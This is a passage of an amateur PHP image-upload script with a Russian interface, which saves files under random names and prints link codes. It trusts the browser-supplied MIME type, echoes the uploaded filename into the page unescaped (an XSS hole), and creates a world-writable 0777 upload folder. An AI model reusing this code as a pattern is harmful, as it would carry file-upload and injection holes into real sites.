'7','8','9','0','-','_');
$rand = "";
for($i = 0; $i < 30; $i++)
{
$index = rand(0, count($arr) - 1);
$rand .= $arr[$index];
}
$img_format;
if ($_FILES['userfile']['type'] == 'image/jpeg') {
$img_format= '.jpg';
};
if ($_FILES['userfile']['type'] == 'image/png') {
$img_format= '.png';
};
if ($_FILES['userfile']['type'] == 'image/gif') {
$img_format= '.gif';
};
$rand_and_format= $rand.$img_format;
if (($_FILES['userfile']['type'] == 'image/jpeg')|($_FILES['userfile']['type'] == 'image/png')|($_FILES['userfile']['type'] == 'image/gif')) {
if (move_uploaded_file($_FILES['userfile']['tmp_name'], 'upload/' . $rand_and_format)) {
echo "Картинка успешно загружена! :)<br/>";
echo '<title>'.$_FILES['userfile']['name'].'</title>';
echo "
<table style=text-align: left; width: 100px; border=0 cellpadding=2 cellspacing=2>
<tbody>
<tr><td><h3><font size='4' face='fantasy' color='white'>Информация о изображении: </font></h3></td><td></td></tr>
<tr><td><b><font size='4' face='fantasy' color='white'>Оригинальное имя:</td><td><font size='4' face='fantasy' color='white'>".$_FILES['userfile']['name']."</font></b></td></font></tr>
<tr><td><b><font size='4' face='fantasy' color='white'>Mime-тип:</td><td><font size='4' face='fantasy' color='white'>".$_FILES['userfile']['type']."</font></b></td></font></tr>
<tr><td><b><font size='4' face='fantasy' color='white'>Вес картинки в байтах:</td><td><font size='4' face='fantasy' color='white'>".$_FILES['userfile']['size']."</font></b></td></font></tr>
<tr><td><b><font size='4' face='fantasy' color='white'>Ссылка на картинку:</td><td><font size='4' face='fantasy' color='white'><input type=text size=120 value='".$url_do_papki."upload/".$rand_and_format."'></font></b></td></font></tr>
<tr><td><b><font size='4' face='fantasy' color='white'>Ссылка на картинку BB-code:</td><td><font size='4' face='fantasy' color='white'><input type=text size=120 value='[img]".$url_do_papki."upload/".$rand_and_format."[/img]'></font></b></td></font></tr>
<tr><td><b><font size='4' face='fantasy' color='white'>Ссылка на картинку HTML:</td><td><font size='4' face='fantasy' color='white'><input type=text size=120 value='<img src=".$url_do_papki."upload/".$rand_and_format.">'></font></b></td></font></tr>
</tbody>
</table>
";
echo '<br/><br/>';
} else {
echo '<center><font color=white size="8">Ошибка! :(<br/>А загружали ли вы файл вообще? ;)</font><br/><a href="'.$_SERVER['PHP_SELF'].'"><input type=button id=button value=Назад></a></center>';
echo '<title>Ошибка :(</title>';
}
echo '<a href='.$_SERVER['PHP_SELF'].'><input type=button id=button value=Назад></a><br><br>';
echo '<style type="text/css">
#invdiv {
display: none;
}
</style>
<script type="text/javascript">
vis = false;
function inputclk() {
var inp = document.getElementById ("inputid");
var div = document.getElementById ("invdiv");
if (vis) {
div.style.display = "none";
inp.value = "Hidden";
vis = false;
} else {
div.style.display = "block";
inp.value = "Visible";
vis = true;
}
}
</script>';
echo '
<br/>
<center><input type="button" id="button" value="Показать картинку" readonly="readonly" onclick="inputclk()" /><br />
<div id="invdiv">
<br/>
<img src="upload/'.$rand_and_format.'" border=1>
</div></center>
';
echo '<br/>';
echo "</font>";
echo "</body>";
} else {
echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />';
echo '<link rel="stylesheet" type="text/css" href="?style" />';
echo '<body background="?img=bg">';
echo '<font size="6" face="fantasy" color="white">';
echo '<center><font size="6" face="fantasy" color="white">Это не картинка...</font></cenetr>';
echo '<center><a href="'.$_SERVER['PHP_SELF'].'"><input type=button id=button value=Назад></a></center>';
echo '</font>';
echo '</body>';
}
} else {
if(isset($_GET['exit']))
{
echo "
<meta http-equiv='content-type' content='text/html; charset=utf-8' />
<title>Выход</title>
<font color='white' size=2 face=fantasy>
<body background='?img=bg'>
<link type=text/css rel=StyleSheet href=?style><center><br><br><br><br>Вы уверены?<br><br><a href=".$_SERVER['PHP_SELF']."?delc_y><input type=button id=button value=Да></a> <a href=".$_SERVER['PHP_SELF']."><input id=button type=button value=Нет></a></center>
</font>";
exit();
} else {
echo '<meta http-equiv="content-type" content="text/html; charset=utf-8" />';
echo '<title>Site :)</title>';
echo '<link rel="stylesheet" type="text/css" href="?style" />';
echo '<body background="?img=bg">';
echo '<font color="white" size=2 face=fantasy>';
echo '<center>';
if ($auth==1)
{
echo '<a href=?exit>Выход</a>';
}
echo '<br/><br/>Поддерживаются форматы PNG, JPG, GIF<br/><br/>';
echo '<form enctype="multipart/form-data" action="?upload" method="post">';
echo '<input type="hidden" name="MAX_FILE_SIZE" value="10485760">';
echo 'Загрузить картинку (не более 10 мб): <input name="userfile" type="file">';
echo '<input type="submit" id=button value="Загрузить"><br/><br/><font size=1>Made By Nikitosavich</font>';
echo '</form>';
echo '</cenetr>';
echo '</font>';
echo '</body>';
}
}
}
if(isset($_GET['delc_y']))
{
setcookie('login');
setcookie('pass');
header("Location: ".$_SERVER['PHP_SELF']);
}
?>P.S. Скрипт сам создаёт папку "upload", с правами доступа "0777".
